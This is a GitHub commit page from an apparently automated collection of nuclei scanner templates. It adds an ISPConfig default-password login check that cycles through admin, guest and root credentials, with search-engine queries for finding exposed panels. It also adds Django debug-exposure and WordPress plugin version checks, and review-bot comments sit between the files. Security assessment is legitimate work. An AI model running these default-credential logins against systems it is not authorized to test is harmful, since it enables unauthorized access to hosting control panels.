20240825
actions-user committed Aug 25, 2024
1 parent eb5f600 commit 2eb80d1
Showing 48 changed files with 1,811 additions and 479 deletions.
2 changes: 1 addition & 1 deletion date.txt
@@ -1 +1 @@
20240824
20240825
20 changes: 20 additions & 0 deletions poc.txt
Expand Up @@ -3345,6 +3345,7 @@
./poc/auth/iptime-default-login-8193.yaml
./poc/auth/iptime-default-login-8194.yaml
./poc/auth/iptime-default-login.yaml
./poc/auth/ispconfig-default-login.yaml
./poc/auth/issabel-login.yaml
./poc/auth/iubenda-cookie-law-solution-0f838161174c3a1452a42342cb556b62.yaml
./poc/auth/iubenda-cookie-law-solution-4353c7e138ff4cafc852aa03c1df2812.yaml
Expand Down Expand Up @@ -7432,6 +7433,7 @@
./poc/config/insecure-cors-configuration.yaml
./poc/config/insecure-network-security-config.yaml
./poc/config/insecure_transport_networksecurityconfig.yaml
./poc/config/ispconfig-default-login.yaml
./poc/config/ispconfig.yaml
./poc/config/joomla-config-dist-file.yaml
./poc/config/joomla-config-file-8374.yaml
Expand Down Expand Up @@ -23803,6 +23805,7 @@
./poc/cve/CVE-2023-0924-5f6349523fa3681f3fb3dddd26ea40cb.yaml
./poc/cve/CVE-2023-0924.yaml
./poc/cve/CVE-2023-0926-9e5bd7af9323069d7f5b80fe13c3adbc.yaml
./poc/cve/CVE-2023-0926.yaml
./poc/cve/CVE-2023-0937-710621abe5c27a3f4d488a85b84e167f.yaml
./poc/cve/CVE-2023-0937.yaml
./poc/cve/CVE-2023-0940-68c8a812a7f4d3db6d4f04bb90d0d9a4.yaml
Expand Down Expand Up @@ -32365,6 +32368,7 @@
./poc/cve/CVE-2023-6986-40ce27a126a874a6f061b95c0f565f63.yaml
./poc/cve/CVE-2023-6986.yaml
./poc/cve/CVE-2023-6987-c1c87c85e30a10fc9ff9a903c209fbf6.yaml
./poc/cve/CVE-2023-6987.yaml
./poc/cve/CVE-2023-6988-159f07c88d3476750318c076d61454ef.yaml
./poc/cve/CVE-2023-6988.yaml
./poc/cve/CVE-2023-6989-f3e101de1aabc79baa4bde571ba04314.yaml
Expand Down Expand Up @@ -34365,6 +34369,7 @@
./poc/cve/CVE-2024-2253-e80d4914f56d0bcf3f9f3038bce09c0d.yaml
./poc/cve/CVE-2024-2253.yaml
./poc/cve/CVE-2024-2254-fff7de08f6116735e0400b319113ddc3.yaml
./poc/cve/CVE-2024-2254.yaml
./poc/cve/CVE-2024-2255-c91737673f0c0121f5550bad7a472ece.yaml
./poc/cve/CVE-2024-2255.yaml
./poc/cve/CVE-2024-2256-baa716bf2c82d44f12eb5944a7db627c.yaml
Expand Down Expand Up @@ -41689,6 +41694,7 @@
./poc/cve/CVE-2024-6491-077c7077f2470ec50c66a49785e52870.yaml
./poc/cve/CVE-2024-6491.yaml
./poc/cve/CVE-2024-6493-8ce30d589b40d67eb51efe70935d8bd9.yaml
./poc/cve/CVE-2024-6493.yaml
./poc/cve/CVE-2024-6494-1f03219d59ff7e715b118bf84690f350.yaml
./poc/cve/CVE-2024-6494.yaml
./poc/cve/CVE-2024-6495-7f7d4d9be9d13fb4035edaa3d3829c0a.yaml
Expand All @@ -41700,6 +41706,7 @@
./poc/cve/CVE-2024-6498-2ab2ecf188af29e491c09cc5e16d6c6a.yaml
./poc/cve/CVE-2024-6498.yaml
./poc/cve/CVE-2024-6499-506582290ab27969bbad70e6796d3810.yaml
./poc/cve/CVE-2024-6499.yaml
./poc/cve/CVE-2024-6500-76d6d82cf0d857f1f99bb5f0649b9e93.yaml
./poc/cve/CVE-2024-6500-e8578bf41793cff7e63bbe53d1903e0e.yaml
./poc/cve/CVE-2024-6500.yaml
Expand Down Expand Up @@ -41782,6 +41789,7 @@
./poc/cve/CVE-2024-6599-aa457f52df54a859bbebb756c962b901.yaml
./poc/cve/CVE-2024-6599.yaml
./poc/cve/CVE-2024-6617-861b78cb0bd74ebded540a2ef2369b65.yaml
./poc/cve/CVE-2024-6617.yaml
./poc/cve/CVE-2024-6621-02b2446a68489e575b652c2201b7d541.yaml
./poc/cve/CVE-2024-6621.yaml
./poc/cve/CVE-2024-6624-3e8f54a8f5a599fccb32276f2c459503.yaml
Expand All @@ -41793,6 +41801,7 @@
./poc/cve/CVE-2024-6629-d16f070910ae811c719a92ea7113c3c7.yaml
./poc/cve/CVE-2024-6629.yaml
./poc/cve/CVE-2024-6631-b90f42cd5d41e04b09c0aa755df89cc7.yaml
./poc/cve/CVE-2024-6631.yaml
./poc/cve/CVE-2024-6634-1294d62a2e83c6ca71566c3b267c34d2.yaml
./poc/cve/CVE-2024-6634.yaml
./poc/cve/CVE-2024-6635-0f3174f37f221bf395fa03e4aca4837b.yaml
Expand All @@ -41810,9 +41819,11 @@
./poc/cve/CVE-2024-6661-865ee81f979d667850ff2bc7887f6239.yaml
./poc/cve/CVE-2024-6661.yaml
./poc/cve/CVE-2024-6665-8c1223ca753362f23c9223b5d83c7625.yaml
./poc/cve/CVE-2024-6665.yaml
./poc/cve/CVE-2024-6666-f524b500b74a1c90be50f56d9d664783.yaml
./poc/cve/CVE-2024-6666.yaml
./poc/cve/CVE-2024-6667-4b06082c59fafdba7199d79388d0eff6.yaml
./poc/cve/CVE-2024-6667.yaml
./poc/cve/CVE-2024-6668-6a6e2b0e2761e93d3ce06e929012b06f.yaml
./poc/cve/CVE-2024-6668.yaml
./poc/cve/CVE-2024-6669-1f8f47157f2608b3fb02a0319a35eb1c.yaml
Expand Down Expand Up @@ -41999,6 +42010,7 @@
./poc/cve/CVE-2024-7350-fae9f5c8afaa9888e7d61c55abf3bb9e.yaml
./poc/cve/CVE-2024-7350.yaml
./poc/cve/CVE-2024-7351-93a2178394f4d78fbcc5b86f7c46b250.yaml
./poc/cve/CVE-2024-7351.yaml
./poc/cve/CVE-2024-7353-51d3774cc31ba9c09e3ef4a4a7c21d55.yaml
./poc/cve/CVE-2024-7353.yaml
./poc/cve/CVE-2024-7355-464a77ba558154888cf73a5cab0a6cc4.yaml
Expand Down Expand Up @@ -42054,6 +42066,7 @@
./poc/cve/CVE-2024-7561-dd941493ec03049c383c879de09e421d.yaml
./poc/cve/CVE-2024-7561.yaml
./poc/cve/CVE-2024-7568-03c9c97fbcce1159bd078f05cbf27da7.yaml
./poc/cve/CVE-2024-7568.yaml
./poc/cve/CVE-2024-7574-003dab2f041ca334b519548f81f66762.yaml
./poc/cve/CVE-2024-7574.yaml
./poc/cve/CVE-2024-7588-72d4c65f8b4a3c39e85f33895621e123.yaml
Expand All @@ -42080,6 +42093,7 @@
./poc/cve/CVE-2024-7651-7d4af77ba7202b412fee68fa25bbbec8.yaml
./poc/cve/CVE-2024-7651.yaml
./poc/cve/CVE-2024-7656-cc628b96623048172302ddea18aada71.yaml
./poc/cve/CVE-2024-7656.yaml
./poc/cve/CVE-2024-7689-f3a5e607572c3ebe82d6cfc65f846263.yaml
./poc/cve/CVE-2024-7689.yaml
./poc/cve/CVE-2024-7690-8d65eb5cdc8a149b1d94856146905574.yaml
Expand Down Expand Up @@ -42113,6 +42127,7 @@
./poc/cve/CVE-2024-7854-c405929374c8ffa2432434eb86f570c7.yaml
./poc/cve/CVE-2024-7854.yaml
./poc/cve/CVE-2024-8120-3613ebb9d30f84ec400bcf99e23d31d1.yaml
./poc/cve/CVE-2024-8120.yaml
./poc/cve/CVE_2023_49442.yaml
./poc/cve/CVE_2023_51467.yaml
./poc/cve/CVE_2024_0195.yaml
Expand Down Expand Up @@ -50374,6 +50389,7 @@
./poc/default/iptime-default-login-8193.yaml
./poc/default/iptime-default-login-8194.yaml
./poc/default/iptime-default-login.yaml
./poc/default/ispconfig-default-login.yaml
./poc/default/jboss-default-password.yaml
./poc/default/jboss-jbpm-default-login.yaml
./poc/default/jeedom-default-login.yaml
Expand Down Expand Up @@ -54147,6 +54163,7 @@
./poc/favicon/favicon-detection-7446.yaml
./poc/favicon/favicon-detection.yaml
./poc/favicon/favicon-generator-7c646439e38a1ba7bbbc75a1ac2635c5.yaml
./poc/favicon/favicon-generator.yaml
./poc/favicon/favicon-rotator-6f8bd28dbfbd78a39c26211650d54ded.yaml
./poc/favicon/favicon-rotator.yaml
./poc/favicon/favicon-switcher-87d4523b4710268d91b0abc72f0e31c5.yaml
Expand Down Expand Up @@ -55695,6 +55712,7 @@
./poc/header/header-footer-code-manager-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/header/header-footer-code-manager-plugin.yaml
./poc/header/header-footer-code-manager.yaml
./poc/header/header-footer-code.yaml
./poc/header/header-footer-elementor-13cbbdbbd61a4c045ef2ff7386dfb654.yaml
./poc/header/header-footer-elementor-13cd3c728a036abc42340e590babbe8b.yaml
./poc/header/header-footer-elementor-232faaa29b050dd09edb1a0a86fedae0.yaml
Expand Down Expand Up @@ -69420,6 +69438,7 @@
./poc/other/devrant.yaml
./poc/other/devto.yaml
./poc/other/devvn-image-hotspot-269eebf1ba30b97f68098501ab57b8df.yaml
./poc/other/devvn-image-hotspot.yaml
./poc/other/dexs-pm-system-868efdaccc5f16808a6fb06fe3a1cbec.yaml
./poc/other/dexs-pm-system-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/other/dexs-pm-system-f0982fd918eb9ba0d5bc8bd0faec3225.yaml
Expand Down Expand Up @@ -76884,6 +76903,7 @@
./poc/other/kbslider-plugin.yaml
./poc/other/kbslider.yaml
./poc/other/kbucket-213e255d0f7bbab0012e0bbbd474a0f3.yaml
./poc/other/kbucket.yaml
./poc/other/kd-coming-soon-2265a234dfded05f01d36b926bceb429.yaml
./poc/other/kd-coming-soon.yaml
./poc/other/kedacom-dvr接入网关.yaml
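--- a/poc/auth/ispconfig-default-login.yaml
+++ b/poc/auth/ispconfig-default-login.yaml
@@ -0,0 +1,63 @@
+id: ispconfig-default-login
+
+info:
+name: ISPConfig - Default Password
+author: pussycat0x
+severity: high
+description: |
+ISPConfig Default Password Vulnerability exposes systems to unauthorized access, compromising data integrity and security.
+metadata:
+verified: true
+max-request: 9
+shodan-query: "http.title:\"ispconfig\""
+tags: default-login,ispconfig
+
+http:
+- raw:
+- |
+GET /login HTTP/1.1
+Host: {{Hostname}}
+- |
+POST /login/index.php HTTP/1.1
+Host: {{Hostname}}
+Content-Type: application/x-www-form-urlencoded
+Origin: {{BaseURL}}
+Connection: close
+Referer: {{RootURL}}/login/
+username={{username}}&password={{password}}&s_mod=login&s_pg=index
+- |
+GET /sites/web_vhost_domain_list.php HTTP/1.1
+Host: {{Hostname}}
+X-Requested-With: XMLHttpRequest
+Referer: {{RootURL}}/index.php
+attack: pitchfork
+payloads:
+username:
+- 'admin'
+- 'guest'
+- 'root'
+password:
+- 'admin'
+- 'password'
+- 'toor'
+
+stop-at-first-match: true
+host-redirects: true
+
+matchers-condition: and
+matchers:
+- type: word
+part: body_3
+words:
+- Tools
+- Websites
+condition: and
+
+- type: status
+status:
+- 200
+# digest: 4b0a004830460221008a28f1d5944e66f8110267e1ef972142f26ab267c802b3014d9e149936f59664022100848b98acb511571071b1ad550692d756860ad969ec7f53b87045972e9996492b:922c64590222798bb761d5b6d8e72950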
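Review bot: The success condition rests on two generic words, `Tools` and `Websites`, in `body_3`, plus a `status` matcher that does not appear to be tied to a particular response, so with `host-redirects: true` any 200 page carrying both words could be reported as a working default login. Pin the status to the third response, for example with a `dsl` matcher `status_code_3 == 200`, and match on a string that only the authenticated ISPConfig site list renders. The `info` block also has no `reference` or `remediation`; a line such as `remediation: Change the default ISPConfig account passwords and restrict access to the control panel.` would tell the recipient what to do with a finding. The same applies to the copy at poc/config/ispconfig-default-login.yaml.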
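--- a/poc/config/ispconfig-default-login.yaml
+++ b/poc/config/ispconfig-default-login.yaml
@@ -0,0 +1,63 @@
+id: ispconfig-default-login
+
+info:
+name: ISPConfig - Default Password
+author: pussycat0x
+severity: high
+description: |
+ISPConfig Default Password Vulnerability exposes systems to unauthorized access, compromising data integrity and security.
+metadata:
+verified: true
+max-request: 9
+shodan-query: "http.title:\"ispconfig\""
+tags: default-login,ispconfig
+
+http:
+- raw:
+- |
+GET /login HTTP/1.1
+Host: {{Hostname}}
+- |
+POST /login/index.php HTTP/1.1
+Host: {{Hostname}}
+Content-Type: application/x-www-form-urlencoded
+Origin: {{BaseURL}}
+Connection: close
+Referer: {{RootURL}}/login/
+username={{username}}&password={{password}}&s_mod=login&s_pg=index
+- |
+GET /sites/web_vhost_domain_list.php HTTP/1.1
+Host: {{Hostname}}
+X-Requested-With: XMLHttpRequest
+Referer: {{RootURL}}/index.php
+attack: pitchfork
+payloads:
+username:
+- 'admin'
+- 'guest'
+- 'root'
+password:
+- 'admin'
+- 'password'
+- 'toor'
+
+stop-at-first-match: true
+host-redirects: true
+
+matchers-condition: and
+matchers:
+- type: word
+part: body_3
+words:
+- Tools
+- Websites
+condition: and
+
+- type: status
+status:
+- 200
+# digest: 4b0a004830460221008a28f1d5944e66f8110267e1ef972142f26ab267c802b3014d9e149936f59664022100848b98acb511571071b1ad550692d756860ad969ec7f53b87045972e9996492b:922c64590222798bb761d5b6d8e72950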
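Review bot: This template is the same as poc/auth/ispconfig-default-login.yaml added in this commit, down to the `id` and the `# digest` line, and poc.txt lists a third copy under poc/default/. Loading the whole tree would presumably either collide on the duplicate `id: ispconfig-default-login` or send the same login sequence several times to one host, which raises the chance of account lockout on the system being assessed. Keep one canonical copy and have the index carry a single path per template id.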
18 changes: 9 additions & 9 deletions poc/cross_site_request_forgery/django-debug-exposure-csrf.yaml
@@ -1,25 +1,25 @@
id: django-debug-exposure

info:
name: Django Debug Exposure
author: geeknik
severity: high
reference:
- https://twitter.com/Alra3ees/status/1397660633928286208
author: shelled
severity: medium
tags: django,exposure

requests:
- method: POST
path:
- "{{BaseURL}}/admin/login/?next=/admin/"

matchers-condition: and
matchers:
- type: status
status:
- 500
- 403

- type: word
part: body
words:
- "DB_HOST"
- "DB_NAME"
- "DJANGO"
- "ADMIN_PASSWORD"
- 'seeing the help section of this page because you have <code>DEBUG ='
- 'True</code>'
condition: and
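Review bot: The `info` block has no `description`, and this section changes `author`, `severity`, the expected status and the matched words without recording why; the rendered page does not show which of the paired lines is the new side. A line such as `description: Detects a Django error page served with DEBUG enabled, which can disclose settings values.` would state what a match is meant to prove. The file also keeps the `requests:` key where the templates added in this commit use `http:`, and its `id` `django-debug-exposure` does not match the file name `django-debug-exposure-csrf.yaml`.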
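--- a/poc/cve/CVE-2023-0926.yaml
+++ b/poc/cve/CVE-2023-0926.yaml
@@ -0,0 +1,59 @@
+id: CVE-2023-0926
+
+info:
+name: >
+Custom Permalinks <= 2.6.0 - Authenticated(Editor+) Stored Cross-Site Scripting
+author: topscoder
+severity: low
+description: >
+The Custom Permalinks plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.6.0 due to insufficient input sanitization and output escaping on tag names. This allows authenticated users, with editor-level permissions or greater to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page, even when 'unfiltered_html' has been disabled.
+reference:
+- https://github.com/topscoder/nuclei-wordfence-cve
+- https://www.wordfence.com/threat-intel/vulnerabilities/id/97f8549a-292d-4a6d-8ec0-550467e5cf0f?source=api-prod
+classification:
+cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N
+cvss-score: 4.4
+cve-id: CVE-2023-0926
+metadata:
+fofa-query: "wp-content/plugins/custom-permalinks/"
+google-query: inurl:"/wp-content/plugins/custom-permalinks/"
+shodan-query: 'vuln:CVE-2023-0926'
+tags: cve,wordpress,wp-plugin,custom-permalinks,low
+
+http:
+- method: GET
+redirects: true
+max-redirects: 3
+path:
+- "{{BaseURL}}/wp-content/plugins/custom-permalinks/readme.txt"
+
+extractors:
+- type: regex
+name: version
+part: body
+group: 1
+internal: true
+regex:
+- "(?mi)Stable tag: ([0-9.]+)"
+
+- type: regex
+name: version
+part: body
+group: 1
+regex:
+- "(?mi)Stable tag: ([0-9.]+)"
+
+matchers-condition: and
+matchers:
+- type: status
+status:
+- 200
+
+- type: word
+words:
+- "custom-permalinks"
+part: body
+
+- type: dsl
+dsl:
+- compare_versions(version, '<= 2.6.0')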
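Review bot: A match only shows that `readme.txt` advertises a `Stable tag` of 2.6.0 or lower; it does not show that the plugin is active, and the described issue needs an editor-level account, yet nothing in `info` marks the result as version inference. State that in the description and add a `remediation` line, e.g. `remediation: Update Custom Permalinks to a release newer than 2.6.0.` The two `regex` extractors are identical except for `internal: true`; if the repetition is deliberate, a comment such as `# repeated without internal so the detected version is shown in the result` above the second one would explain it.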